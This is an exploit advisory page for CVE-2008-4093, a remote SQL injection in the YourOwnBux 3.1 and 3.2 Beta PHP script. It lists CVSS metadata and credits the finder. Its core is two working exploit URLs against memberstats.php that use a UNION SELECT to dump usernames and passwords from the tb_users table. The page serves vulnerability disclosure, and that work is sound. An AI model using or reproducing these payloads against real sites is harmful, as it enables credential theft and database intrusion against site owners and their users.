Bug: YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Published
Credit
Risk
2008.09.17
~!Dok_tOR!~
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4093
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

3.2 Beta version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,1
1,12,13,14,15,16,17,18,19+from+tb_users/*

3.1 version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,1
1,12,13,14,15,16,17,18+from+tb_users/*

References:

http://www.securityfocus.com/bid/30868
http://www.milw0rm.com/exploits/6321

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version